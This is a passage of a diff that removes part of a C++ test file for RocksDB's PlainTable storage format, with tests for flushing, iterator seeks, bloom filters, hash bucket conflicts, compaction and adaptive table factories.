-      const TableReaderOptions& table_reader_options,
-      unique_ptr<RandomAccessFileReader>&& file, uint64_t file_size,
-      unique_ptr<TableReader>* table,
-      bool prefetch_index_and_filter_in_cache) const override {
-    TableProperties* props = nullptr;
-    auto s =
-        ReadTableProperties(file.get(), file_size, kPlainTableMagicNumber,
-                            table_reader_options.ioptions, &props);
-    EXPECT_TRUE(s.ok());
-
-    if (store_index_in_file_) {
-      BlockHandle bloom_block_handle;
-      s = FindMetaBlock(file.get(), file_size, kPlainTableMagicNumber,
-                        table_reader_options.ioptions,
-                        BloomBlockBuilder::kBloomBlock, &bloom_block_handle);
-      EXPECT_TRUE(s.ok());
-
-      BlockHandle index_block_handle;
-      s = FindMetaBlock(file.get(), file_size, kPlainTableMagicNumber,
-                        table_reader_options.ioptions,
-                        PlainTableIndexBuilder::kPlainTableIndexBlock,
-                        &index_block_handle);
-      EXPECT_TRUE(s.ok());
-    }
-
-    auto& user_props = props->user_collected_properties;
-    auto encoding_type_prop =
-        user_props.find(PlainTablePropertyNames::kEncodingType);
-    assert(encoding_type_prop != user_props.end());
-    EncodingType encoding_type = static_cast<EncodingType>(
-        DecodeFixed32(encoding_type_prop->second.c_str()));
-
-    std::unique_ptr<PlainTableReader> new_reader(new TestPlainTableReader(
-        table_reader_options.env_options,
-        table_reader_options.internal_comparator, encoding_type, file_size,
-        bloom_bits_per_key_, hash_table_ratio_, index_sparseness_, props,
-        std::move(file), table_reader_options.ioptions, expect_bloom_not_match_,
-        store_index_in_file_, column_family_id_, column_family_name_));
-
-    *table = std::move(new_reader);
-    return s;
-  }
-
- private:
-  int bloom_bits_per_key_;
-  double hash_table_ratio_;
-  size_t index_sparseness_;
-  bool store_index_in_file_;
-  bool* expect_bloom_not_match_;
-  const uint32_t column_family_id_;
-  const std::string column_family_name_;
-};
-
-TEST_P(PlainTableDBTest, Flush) {
-  for (size_t huge_page_tlb_size = 0; huge_page_tlb_size <= 2 * 1024 * 1024;
-       huge_page_tlb_size += 2 * 1024 * 1024) {
-    for (EncodingType encoding_type : {kPlain, kPrefix}) {
-    for (int bloom_bits = 0; bloom_bits <= 117; bloom_bits += 117) {
-      for (int total_order = 0; total_order <= 1; total_order++) {
-        for (int store_index_in_file = 0; store_index_in_file <= 1;
-             ++store_index_in_file) {
-          Options options = CurrentOptions();
-          options.create_if_missing = true;
-          // Set only one bucket to force bucket conflict.
-          // Test index interval for the same prefix to be 1, 2 and 4
-          if (total_order) {
-            options.prefix_extractor.reset();
-
-            PlainTableOptions plain_table_options;
-            plain_table_options.user_key_len = 0;
-            plain_table_options.bloom_bits_per_key = bloom_bits;
-            plain_table_options.hash_table_ratio = 0;
-            plain_table_options.index_sparseness = 2;
-            plain_table_options.huge_page_tlb_size = huge_page_tlb_size;
-            plain_table_options.encoding_type = encoding_type;
-            plain_table_options.full_scan_mode = false;
-            plain_table_options.store_index_in_file = store_index_in_file;
-
-            options.table_factory.reset(
-                NewPlainTableFactory(plain_table_options));
-          } else {
-            PlainTableOptions plain_table_options;
-            plain_table_options.user_key_len = 0;
-            plain_table_options.bloom_bits_per_key = bloom_bits;
-            plain_table_options.hash_table_ratio = 0.75;
-            plain_table_options.index_sparseness = 16;
-            plain_table_options.huge_page_tlb_size = huge_page_tlb_size;
-            plain_table_options.encoding_type = encoding_type;
-            plain_table_options.full_scan_mode = false;
-            plain_table_options.store_index_in_file = store_index_in_file;
-
-            options.table_factory.reset(
-                NewPlainTableFactory(plain_table_options));
-          }
-          DestroyAndReopen(&options);
-          uint64_t int_num;
-          ASSERT_TRUE(dbfull()->GetIntProperty(
-              "rocksdb.estimate-table-readers-mem", &int_num));
-          ASSERT_EQ(int_num, 0U);
-
-          ASSERT_OK(Put("1000000000000foo", "v1"));
-          ASSERT_OK(Put("0000000000000bar", "v2"));
-          ASSERT_OK(Put("1000000000000foo", "v3"));
-          dbfull()->TEST_FlushMemTable();
-
-          ASSERT_TRUE(dbfull()->GetIntProperty(
-              "rocksdb.estimate-table-readers-mem", &int_num));
-          ASSERT_GT(int_num, 0U);
-
-          TablePropertiesCollection ptc;
-          reinterpret_cast<DB*>(dbfull())->GetPropertiesOfAllTables(&ptc);
-          ASSERT_EQ(1U, ptc.size());
-          auto row = ptc.begin();
-          auto tp = row->second;
-
-          if (!store_index_in_file) {
-            ASSERT_EQ(total_order ? "4" : "12",
-                      (tp->user_collected_properties)
-                          .at("plain_table_hash_table_size"));
-            ASSERT_EQ("0", (tp->user_collected_properties)
-                               .at("plain_table_sub_index_size"));
-          } else {
-            ASSERT_EQ("0", (tp->user_collected_properties)
-                               .at("plain_table_hash_table_size"));
-            ASSERT_EQ("0", (tp->user_collected_properties)
-                               .at("plain_table_sub_index_size"));
-          }
-          ASSERT_EQ("v3", Get("1000000000000foo"));
-          ASSERT_EQ("v2", Get("0000000000000bar"));
-        }
-        }
-      }
-    }
-  }
-}
-
-TEST_P(PlainTableDBTest, Flush2) {
-  for (size_t huge_page_tlb_size = 0; huge_page_tlb_size <= 2 * 1024 * 1024;
-       huge_page_tlb_size += 2 * 1024 * 1024) {
-    for (EncodingType encoding_type : {kPlain, kPrefix}) {
-    for (int bloom_bits = 0; bloom_bits <= 117; bloom_bits += 117) {
-      for (int total_order = 0; total_order <= 1; total_order++) {
-        for (int store_index_in_file = 0; store_index_in_file <= 1;
-             ++store_index_in_file) {
-          if (encoding_type == kPrefix && total_order) {
-            continue;
-          }
-          if (!bloom_bits && store_index_in_file) {
-            continue;
-          }
-          if (total_order && store_index_in_file) {
-          continue;
-        }
-        bool expect_bloom_not_match = false;
-        Options options = CurrentOptions();
-        options.create_if_missing = true;
-        // Set only one bucket to force bucket conflict.
-        // Test index interval for the same prefix to be 1, 2 and 4
-        PlainTableOptions plain_table_options;
-        if (total_order) {
-          options.prefix_extractor = nullptr;
-          plain_table_options.hash_table_ratio = 0;
-          plain_table_options.index_sparseness = 2;
-        } else {
-          plain_table_options.hash_table_ratio = 0.75;
-          plain_table_options.index_sparseness = 16;
-        }
-        plain_table_options.user_key_len = kPlainTableVariableLength;
-        plain_table_options.bloom_bits_per_key = bloom_bits;
-        plain_table_options.huge_page_tlb_size = huge_page_tlb_size;
-        plain_table_options.encoding_type = encoding_type;
-        plain_table_options.store_index_in_file = store_index_in_file;
-        options.table_factory.reset(new TestPlainTableFactory(
-            &expect_bloom_not_match, plain_table_options,
-            0 /* column_family_id */, kDefaultColumnFamilyName));
-
-        DestroyAndReopen(&options);
-        ASSERT_OK(Put("0000000000000bar", "b"));
-        ASSERT_OK(Put("1000000000000foo", "v1"));
-        dbfull()->TEST_FlushMemTable();
-
-        ASSERT_OK(Put("1000000000000foo", "v2"));
-        dbfull()->TEST_FlushMemTable();
-        ASSERT_EQ("v2", Get("1000000000000foo"));
-
-        ASSERT_OK(Put("0000000000000eee", "v3"));
-        dbfull()->TEST_FlushMemTable();
-        ASSERT_EQ("v3", Get("0000000000000eee"));
-
-        ASSERT_OK(Delete("0000000000000bar"));
-        dbfull()->TEST_FlushMemTable();
-        ASSERT_EQ("NOT_FOUND", Get("0000000000000bar"));
-
-        ASSERT_OK(Put("0000000000000eee", "v5"));
-        ASSERT_OK(Put("9000000000000eee", "v5"));
-        dbfull()->TEST_FlushMemTable();
-        ASSERT_EQ("v5", Get("0000000000000eee"));
-
-        // Test Bloom Filter
-        if (bloom_bits > 0) {
-          // Neither key nor value should exist.
-          expect_bloom_not_match = true;
-          ASSERT_EQ("NOT_FOUND", Get("5_not00000000bar"));
-          // Key doesn't exist any more but prefix exists.
-          if (total_order) {
-            ASSERT_EQ("NOT_FOUND", Get("1000000000000not"));
-            ASSERT_EQ("NOT_FOUND", Get("0000000000000not"));
-          }
-          expect_bloom_not_match = false;
-        }
-      }
-      }
-    }
-    }
-  }
-}
-
-TEST_P(PlainTableDBTest, Iterator) {
-  for (size_t huge_page_tlb_size = 0; huge_page_tlb_size <= 2 * 1024 * 1024;
-       huge_page_tlb_size += 2 * 1024 * 1024) {
-    for (EncodingType encoding_type : {kPlain, kPrefix}) {
-    for (int bloom_bits = 0; bloom_bits <= 117; bloom_bits += 117) {
-      for (int total_order = 0; total_order <= 1; total_order++) {
-        if (encoding_type == kPrefix && total_order == 1) {
-          continue;
-        }
-        bool expect_bloom_not_match = false;
-        Options options = CurrentOptions();
-        options.create_if_missing = true;
-        // Set only one bucket to force bucket conflict.
-        // Test index interval for the same prefix to be 1, 2 and 4
-        if (total_order) {
-          options.prefix_extractor = nullptr;
-
-          PlainTableOptions plain_table_options;
-          plain_table_options.user_key_len = 16;
-          plain_table_options.bloom_bits_per_key = bloom_bits;
-          plain_table_options.hash_table_ratio = 0;
-          plain_table_options.index_sparseness = 2;
-          plain_table_options.huge_page_tlb_size = huge_page_tlb_size;
-          plain_table_options.encoding_type = encoding_type;
-
-          options.table_factory.reset(new TestPlainTableFactory(
-              &expect_bloom_not_match, plain_table_options,
-              0 /* column_family_id */, kDefaultColumnFamilyName));
-        } else {
-          PlainTableOptions plain_table_options;
-          plain_table_options.user_key_len = 16;
-          plain_table_options.bloom_bits_per_key = bloom_bits;
-          plain_table_options.hash_table_ratio = 0.75;
-          plain_table_options.index_sparseness = 16;
-          plain_table_options.huge_page_tlb_size = huge_page_tlb_size;
-          plain_table_options.encoding_type = encoding_type;
-
-          options.table_factory.reset(new TestPlainTableFactory(
-              &expect_bloom_not_match, plain_table_options,
-              0 /* column_family_id */, kDefaultColumnFamilyName));
-        }
-        DestroyAndReopen(&options);
-
-        ASSERT_OK(Put("1000000000foo002", "v_2"));
-        ASSERT_OK(Put("0000000000000bar", "random"));
-        ASSERT_OK(Put("1000000000foo001", "v1"));
-        ASSERT_OK(Put("3000000000000bar", "bar_v"));
-        ASSERT_OK(Put("1000000000foo003", "v__3"));
-        ASSERT_OK(Put("1000000000foo004", "v__4"));
-        ASSERT_OK(Put("1000000000foo005", "v__5"));
-        ASSERT_OK(Put("1000000000foo007", "v__7"));
-        ASSERT_OK(Put("1000000000foo008", "v__8"));
-        dbfull()->TEST_FlushMemTable();
-        ASSERT_EQ("v1", Get("1000000000foo001"));
-        ASSERT_EQ("v__3", Get("1000000000foo003"));
-        Iterator* iter = dbfull()->NewIterator(ReadOptions());
-        iter->Seek("1000000000foo000");
-        ASSERT_TRUE(iter->Valid());
-        ASSERT_EQ("1000000000foo001", iter->key().ToString());
-        ASSERT_EQ("v1", iter->value().ToString());
-
-        iter->Next();
-        ASSERT_TRUE(iter->Valid());
-        ASSERT_EQ("1000000000foo002", iter->key().ToString());
-        ASSERT_EQ("v_2", iter->value().ToString());
-
-        iter->Next();
-        ASSERT_TRUE(iter->Valid());
-        ASSERT_EQ("1000000000foo003", iter->key().ToString());
-        ASSERT_EQ("v__3", iter->value().ToString());
-
-        iter->Next();
-        ASSERT_TRUE(iter->Valid());
-        ASSERT_EQ("1000000000foo004", iter->key().ToString());
-        ASSERT_EQ("v__4", iter->value().ToString());
-
-        iter->Seek("3000000000000bar");
-        ASSERT_TRUE(iter->Valid());
-        ASSERT_EQ("3000000000000bar", iter->key().ToString());
-        ASSERT_EQ("bar_v", iter->value().ToString());
-
-        iter->Seek("1000000000foo000");
-        ASSERT_TRUE(iter->Valid());
-        ASSERT_EQ("1000000000foo001", iter->key().ToString());
-        ASSERT_EQ("v1", iter->value().ToString());
-
-        iter->Seek("1000000000foo005");
-        ASSERT_TRUE(iter->Valid());
-        ASSERT_EQ("1000000000foo005", iter->key().ToString());
-        ASSERT_EQ("v__5", iter->value().ToString());
-
-        iter->Seek("1000000000foo006");
-        ASSERT_TRUE(iter->Valid());
-        ASSERT_EQ("1000000000foo007", iter->key().ToString());
-        ASSERT_EQ("v__7", iter->value().ToString());
-
-        iter->Seek("1000000000foo008");
-        ASSERT_TRUE(iter->Valid());
-        ASSERT_EQ("1000000000foo008", iter->key().ToString());
-        ASSERT_EQ("v__8", iter->value().ToString());
-
-        if (total_order == 0) {
-          iter->Seek("1000000000foo009");
-          ASSERT_TRUE(iter->Valid());
-          ASSERT_EQ("3000000000000bar", iter->key().ToString());
-        }
-
-        // Test Bloom Filter
-        if (bloom_bits > 0) {
-          if (!total_order) {
-            // Neither key nor value should exist.
-            expect_bloom_not_match = true;
-            iter->Seek("2not000000000bar");
-            ASSERT_TRUE(!iter->Valid());
-            ASSERT_EQ("NOT_FOUND", Get("2not000000000bar"));
-            expect_bloom_not_match = false;
-          } else {
-            expect_bloom_not_match = true;
-            ASSERT_EQ("NOT_FOUND", Get("2not000000000bar"));
-            expect_bloom_not_match = false;
-          }
-        }
-
-        delete iter;
-      }
-    }
-    }
-  }
-}
-
-namespace {
-std::string MakeLongKey(size_t length, char c) {
-  return std::string(length, c);
-}
-}  // namespace
-
-TEST_P(PlainTableDBTest, IteratorLargeKeys) {
-  Options options = CurrentOptions();
-
-  PlainTableOptions plain_table_options;
-  plain_table_options.user_key_len = 0;
-  plain_table_options.bloom_bits_per_key = 0;
-  plain_table_options.hash_table_ratio = 0;
-
-  options.table_factory.reset(NewPlainTableFactory(plain_table_options));
-  options.create_if_missing = true;
-  options.prefix_extractor.reset();
-  DestroyAndReopen(&options);
-
-  std::string key_list[] = {
-      MakeLongKey(30, '0'),
-      MakeLongKey(16, '1'),
-      MakeLongKey(32, '2'),
-      MakeLongKey(60, '3'),
-      MakeLongKey(90, '4'),
-      MakeLongKey(50, '5'),
-      MakeLongKey(26, '6')
-  };
-
-  for (size_t i = 0; i < 7; i++) {
-    ASSERT_OK(Put(key_list[i], ToString(i)));
-  }
-
-  dbfull()->TEST_FlushMemTable();
-
-  Iterator* iter = dbfull()->NewIterator(ReadOptions());
-  iter->Seek(key_list[0]);
-
-  for (size_t i = 0; i < 7; i++) {
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(key_list[i], iter->key().ToString());
-    ASSERT_EQ(ToString(i), iter->value().ToString());
-    iter->Next();
-  }
-
-  ASSERT_TRUE(!iter->Valid());
-
-  delete iter;
-}
-
-namespace {
-std::string MakeLongKeyWithPrefix(size_t length, char c) {
-  return "00000000" + std::string(length - 8, c);
-}
-}  // namespace
-
-TEST_P(PlainTableDBTest, IteratorLargeKeysWithPrefix) {
-  Options options = CurrentOptions();
-
-  PlainTableOptions plain_table_options;
-  plain_table_options.user_key_len = 16;
-  plain_table_options.bloom_bits_per_key = 0;
-  plain_table_options.hash_table_ratio = 0.8;
-  plain_table_options.index_sparseness = 3;
-  plain_table_options.huge_page_tlb_size = 0;
-  plain_table_options.encoding_type = kPrefix;
-
-  options.table_factory.reset(NewPlainTableFactory(plain_table_options));
-  options.create_if_missing = true;
-  DestroyAndReopen(&options);
-
-  std::string key_list[] = {
-      MakeLongKeyWithPrefix(30, '0'), MakeLongKeyWithPrefix(16, '1'),
-      MakeLongKeyWithPrefix(32, '2'), MakeLongKeyWithPrefix(60, '3'),
-      MakeLongKeyWithPrefix(90, '4'), MakeLongKeyWithPrefix(50, '5'),
-      MakeLongKeyWithPrefix(26, '6')};
-
-  for (size_t i = 0; i < 7; i++) {
-    ASSERT_OK(Put(key_list[i], ToString(i)));
-  }
-
-  dbfull()->TEST_FlushMemTable();
-
-  Iterator* iter = dbfull()->NewIterator(ReadOptions());
-  iter->Seek(key_list[0]);
-
-  for (size_t i = 0; i < 7; i++) {
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(key_list[i], iter->key().ToString());
-    ASSERT_EQ(ToString(i), iter->value().ToString());
-    iter->Next();
-  }
-
-  ASSERT_TRUE(!iter->Valid());
-
-  delete iter;
-}
-
-TEST_P(PlainTableDBTest, IteratorReverseSuffixComparator) {
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  // Set only one bucket to force bucket conflict.
-  // Test index interval for the same prefix to be 1, 2 and 4
-  test::SimpleSuffixReverseComparator comp;
-  options.comparator = &comp;
-  DestroyAndReopen(&options);
-
-  ASSERT_OK(Put("1000000000foo002", "v_2"));
-  ASSERT_OK(Put("0000000000000bar", "random"));
-  ASSERT_OK(Put("1000000000foo001", "v1"));
-  ASSERT_OK(Put("3000000000000bar", "bar_v"));
-  ASSERT_OK(Put("1000000000foo003", "v__3"));
-  ASSERT_OK(Put("1000000000foo004", "v__4"));
-  ASSERT_OK(Put("1000000000foo005", "v__5"));
-  ASSERT_OK(Put("1000000000foo007", "v__7"));
-  ASSERT_OK(Put("1000000000foo008", "v__8"));
-  dbfull()->TEST_FlushMemTable();
-  ASSERT_EQ("v1", Get("1000000000foo001"));
-  ASSERT_EQ("v__3", Get("1000000000foo003"));
-  Iterator* iter = dbfull()->NewIterator(ReadOptions());
-  iter->Seek("1000000000foo009");
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("1000000000foo008", iter->key().ToString());
-  ASSERT_EQ("v__8", iter->value().ToString());
-
-  iter->Next();
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("1000000000foo007", iter->key().ToString());
-  ASSERT_EQ("v__7", iter->value().ToString());
-
-  iter->Next();
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("1000000000foo005", iter->key().ToString());
-  ASSERT_EQ("v__5", iter->value().ToString());
-
-  iter->Next();
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("1000000000foo004", iter->key().ToString());
-  ASSERT_EQ("v__4", iter->value().ToString());
-
-  iter->Seek("3000000000000bar");
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("3000000000000bar", iter->key().ToString());
-  ASSERT_EQ("bar_v", iter->value().ToString());
-
-  iter->Seek("1000000000foo005");
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("1000000000foo005", iter->key().ToString());
-  ASSERT_EQ("v__5", iter->value().ToString());
-
-  iter->Seek("1000000000foo006");
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("1000000000foo005", iter->key().ToString());
-  ASSERT_EQ("v__5", iter->value().ToString());
-
-  iter->Seek("1000000000foo008");
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("1000000000foo008", iter->key().ToString());
-  ASSERT_EQ("v__8", iter->value().ToString());
-
-  iter->Seek("1000000000foo000");
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("3000000000000bar", iter->key().ToString());
-
-  delete iter;
-}
-
-TEST_P(PlainTableDBTest, HashBucketConflict) {
-  for (size_t huge_page_tlb_size = 0; huge_page_tlb_size <= 2 * 1024 * 1024;
-       huge_page_tlb_size += 2 * 1024 * 1024) {
-    for (unsigned char i = 1; i <= 3; i++) {
-      Options options = CurrentOptions();
-      options.create_if_missing = true;
-      // Set only one bucket to force bucket conflict.
-      // Test index interval for the same prefix to be 1, 2 and 4
-
-      PlainTableOptions plain_table_options;
-      plain_table_options.user_key_len = 16;
-      plain_table_options.bloom_bits_per_key = 0;
-      plain_table_options.hash_table_ratio = 0;
-      plain_table_options.index_sparseness = 2 ^ i;
-      plain_table_options.huge_page_tlb_size = huge_page_tlb_size;
-
-      options.table_factory.reset(NewPlainTableFactory(plain_table_options));
-
-      DestroyAndReopen(&options);
-      ASSERT_OK(Put("5000000000000fo0", "v1"));
-      ASSERT_OK(Put("5000000000000fo1", "v2"));
-      ASSERT_OK(Put("5000000000000fo2", "v"));
-      ASSERT_OK(Put("2000000000000fo0", "v3"));
-      ASSERT_OK(Put("2000000000000fo1", "v4"));
-      ASSERT_OK(Put("2000000000000fo2", "v"));
-      ASSERT_OK(Put("2000000000000fo3", "v"));
-
-      dbfull()->TEST_FlushMemTable();
-
-      ASSERT_EQ("v1", Get("5000000000000fo0"));
-      ASSERT_EQ("v2", Get("5000000000000fo1"));
-      ASSERT_EQ("v3", Get("2000000000000fo0"));
-      ASSERT_EQ("v4", Get("2000000000000fo1"));
-
-      ASSERT_EQ("NOT_FOUND", Get("5000000000000bar"));
-      ASSERT_EQ("NOT_FOUND", Get("2000000000000bar"));
-      ASSERT_EQ("NOT_FOUND", Get("5000000000000fo8"));
-      ASSERT_EQ("NOT_FOUND", Get("2000000000000fo8"));
-
-      ReadOptions ro;
-      Iterator* iter = dbfull()->NewIterator(ro);
-
-      iter->Seek("5000000000000fo0");
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_EQ("5000000000000fo0", iter->key().ToString());
-      iter->Next();
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_EQ("5000000000000fo1", iter->key().ToString());
-
-      iter->Seek("5000000000000fo1");
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_EQ("5000000000000fo1", iter->key().ToString());
-
-      iter->Seek("2000000000000fo0");
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_EQ("2000000000000fo0", iter->key().ToString());
-      iter->Next();
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_EQ("2000000000000fo1", iter->key().ToString());
-
-      iter->Seek("2000000000000fo1");
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_EQ("2000000000000fo1", iter->key().ToString());
-
-      iter->Seek("2000000000000bar");
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_EQ("2000000000000fo0", iter->key().ToString());
-
-      iter->Seek("5000000000000bar");
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_EQ("5000000000000fo0", iter->key().ToString());
-
-      iter->Seek("2000000000000fo8");
-      ASSERT_TRUE(!iter->Valid() ||
-                  options.comparator->Compare(iter->key(), "20000001") > 0);
-
-      iter->Seek("5000000000000fo8");
-      ASSERT_TRUE(!iter->Valid());
-
-      iter->Seek("1000000000000fo2");
-      ASSERT_TRUE(!iter->Valid());
-
-      iter->Seek("3000000000000fo2");
-      ASSERT_TRUE(!iter->Valid());
-
-      iter->Seek("8000000000000fo2");
-      ASSERT_TRUE(!iter->Valid());
-
-      delete iter;
-    }
-  }
-}
-
-TEST_P(PlainTableDBTest, HashBucketConflictReverseSuffixComparator) {
-  for (size_t huge_page_tlb_size = 0; huge_page_tlb_size <= 2 * 1024 * 1024;
-       huge_page_tlb_size += 2 * 1024 * 1024) {
-    for (unsigned char i = 1; i <= 3; i++) {
-      Options options = CurrentOptions();
-      options.create_if_missing = true;
-      test::SimpleSuffixReverseComparator comp;
-      options.comparator = &comp;
-      // Set only one bucket to force bucket conflict.
-      // Test index interval for the same prefix to be 1, 2 and 4
-
-      PlainTableOptions plain_table_options;
-      plain_table_options.user_key_len = 16;
-      plain_table_options.bloom_bits_per_key = 0;
-      plain_table_options.hash_table_ratio = 0;
-      plain_table_options.index_sparseness = 2 ^ i;
-      plain_table_options.huge_page_tlb_size = huge_page_tlb_size;
-
-      options.table_factory.reset(NewPlainTableFactory(plain_table_options));
-      DestroyAndReopen(&options);
-      ASSERT_OK(Put("5000000000000fo0", "v1"));
-      ASSERT_OK(Put("5000000000000fo1", "v2"));
-      ASSERT_OK(Put("5000000000000fo2", "v"));
-      ASSERT_OK(Put("2000000000000fo0", "v3"));
-      ASSERT_OK(Put("2000000000000fo1", "v4"));
-      ASSERT_OK(Put("2000000000000fo2", "v"));
-      ASSERT_OK(Put("2000000000000fo3", "v"));
-
-      dbfull()->TEST_FlushMemTable();
-
-      ASSERT_EQ("v1", Get("5000000000000fo0"));
-      ASSERT_EQ("v2", Get("5000000000000fo1"));
-      ASSERT_EQ("v3", Get("2000000000000fo0"));
-      ASSERT_EQ("v4", Get("2000000000000fo1"));
-
-      ASSERT_EQ("NOT_FOUND", Get("5000000000000bar"));
-      ASSERT_EQ("NOT_FOUND", Get("2000000000000bar"));
-      ASSERT_EQ("NOT_FOUND", Get("5000000000000fo8"));
-      ASSERT_EQ("NOT_FOUND", Get("2000000000000fo8"));
-
-      ReadOptions ro;
-      Iterator* iter = dbfull()->NewIterator(ro);
-
-      iter->Seek("5000000000000fo1");
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_EQ("5000000000000fo1", iter->key().ToString());
-      iter->Next();
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_EQ("5000000000000fo0", iter->key().ToString());
-
-      iter->Seek("5000000000000fo1");
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_EQ("5000000000000fo1", iter->key().ToString());
-
-      iter->Seek("2000000000000fo1");
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_EQ("2000000000000fo1", iter->key().ToString());
-      iter->Next();
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_EQ("2000000000000fo0", iter->key().ToString());
-
-      iter->Seek("2000000000000fo1");
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_EQ("2000000000000fo1", iter->key().ToString());
-
-      iter->Seek("2000000000000var");
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_EQ("2000000000000fo3", iter->key().ToString());
-
-      iter->Seek("5000000000000var");
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_EQ("5000000000000fo2", iter->key().ToString());
-
-      std::string seek_key = "2000000000000bar";
-      iter->Seek(seek_key);
-      ASSERT_TRUE(!iter->Valid() ||
-                  options.prefix_extractor->Transform(iter->key()) !=
-                      options.prefix_extractor->Transform(seek_key));
-
-      iter->Seek("1000000000000fo2");
-      ASSERT_TRUE(!iter->Valid());
-
-      iter->Seek("3000000000000fo2");
-      ASSERT_TRUE(!iter->Valid());
-
-      iter->Seek("8000000000000fo2");
-      ASSERT_TRUE(!iter->Valid());
-
-      delete iter;
-    }
-  }
-}
-
-TEST_P(PlainTableDBTest, NonExistingKeyToNonEmptyBucket) {
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  // Set only one bucket to force bucket conflict.
-  // Test index interval for the same prefix to be 1, 2 and 4
-  PlainTableOptions plain_table_options;
-  plain_table_options.user_key_len = 16;
-  plain_table_options.bloom_bits_per_key = 0;
-  plain_table_options.hash_table_ratio = 0;
-  plain_table_options.index_sparseness = 5;
-
-  options.table_factory.reset(NewPlainTableFactory(plain_table_options));
-  DestroyAndReopen(&options);
-  ASSERT_OK(Put("5000000000000fo0", "v1"));
-  ASSERT_OK(Put("5000000000000fo1", "v2"));
-  ASSERT_OK(Put("5000000000000fo2", "v3"));
-
-  dbfull()->TEST_FlushMemTable();
-
-  ASSERT_EQ("v1", Get("5000000000000fo0"));
-  ASSERT_EQ("v2", Get("5000000000000fo1"));
-  ASSERT_EQ("v3", Get("5000000000000fo2"));
-
-  ASSERT_EQ("NOT_FOUND", Get("8000000000000bar"));
-  ASSERT_EQ("NOT_FOUND", Get("1000000000000bar"));
-
-  Iterator* iter = dbfull()->NewIterator(ReadOptions());
-
-  iter->Seek("5000000000000bar");
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("5000000000000fo0", iter->key().ToString());
-
-  iter->Seek("5000000000000fo8");
-  ASSERT_TRUE(!iter->Valid());
-
-  iter->Seek("1000000000000fo2");
-  ASSERT_TRUE(!iter->Valid());
-
-  iter->Seek("8000000000000fo2");
-  ASSERT_TRUE(!iter->Valid());
-
-  delete iter;
-}
-
-static std::string Key(int i) {
-  char buf[100];
-  snprintf(buf, sizeof(buf), "key_______%06d", i);
-  return std::string(buf);
-}
-
-static std::string RandomString(Random* rnd, int len) {
-  std::string r;
-  test::RandomString(rnd, len, &r);
-  return r;
-}
-
-TEST_P(PlainTableDBTest, CompactionTrigger) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 120 << 10;  // 100KB
-  options.num_levels = 3;
-  options.level0_file_num_compaction_trigger = 3;
-  Reopen(&options);
-
-  Random rnd(301);
-
-  for (int num = 0; num < options.level0_file_num_compaction_trigger - 1;
-      num++) {
-    std::vector<std::string> values;
-    // Write 120KB (10 values, each 12K)
-    for (int i = 0; i < 10; i++) {
-      values.push_back(RandomString(&rnd, 12000));
-      ASSERT_OK(Put(Key(i), values[i]));
-    }
-    ASSERT_OK(Put(Key(999), ""));
-    dbfull()->TEST_WaitForFlushMemTable();
-    ASSERT_EQ(NumTableFilesAtLevel(0), num + 1);
-  }
-
-  //generate one more file in level-0, and should trigger level-0 compaction
-  std::vector<std::string> values;
-  for (int i = 0; i < 12; i++) {
-    values.push_back(RandomString(&rnd, 10000));
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Put(Key(999), ""));
-  dbfull()->TEST_WaitForCompact();
-
-  ASSERT_EQ(NumTableFilesAtLevel(0), 0);
-  ASSERT_EQ(NumTableFilesAtLevel(1), 1);
-}
-
-TEST_P(PlainTableDBTest, AdaptiveTable) {
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-
-  options.table_factory.reset(NewPlainTableFactory());
-  DestroyAndReopen(&options);
-
-  ASSERT_OK(Put("1000000000000foo", "v1"));
-  ASSERT_OK(Put("0000000000000bar", "v2"));
-  ASSERT_OK(Put("1000000000000foo", "v3"));
-  dbfull()->TEST_FlushMemTable();
-
-  options.create_if_missing = false;
-  std::shared_ptr<TableFactory> dummy_factory;
-  std::shared_ptr<TableFactory> block_based_factory(
-      NewBlockBasedTableFactory());
-  options.table_factory.reset(NewAdaptiveTableFactory(
-      block_based_factory, dummy_factory, dummy_factory));
-  Reopen(&options);
-  ASSERT_EQ("v3", Get("1000000000000foo"));
-  ASSERT_EQ("v2", Get("0000000000000bar"));
-
-  ASSERT_OK(Put("2000000000000foo", "v4"));
-  ASSERT_OK(Put("3000000000000bar", "v5"));
-  dbfull()->TEST_FlushMemTable();
-  ASSERT_EQ("v4", Get("2000000000000foo"));
-  ASSERT_EQ("v5", Get("3000000000000bar"));
-
-  Reopen(&options);
-  ASSERT_EQ("v3", Get("1000000000000foo"));
-  ASSERT_EQ("v2", Get("0000000000000bar"));
-  ASSERT_EQ("v4", Get("2000000000000foo"));
-  ASSERT_EQ("v5", Get("3000000000000bar"));
-
-  options.table_factory.reset(NewBlockBasedTableFactory());
-  Reopen(&options);
-  ASSERT_NE("v3", Get("1000000000000foo"));
-
-  options.table_factory.reset(NewPlainTableFactory());
-  Reopen(&options);
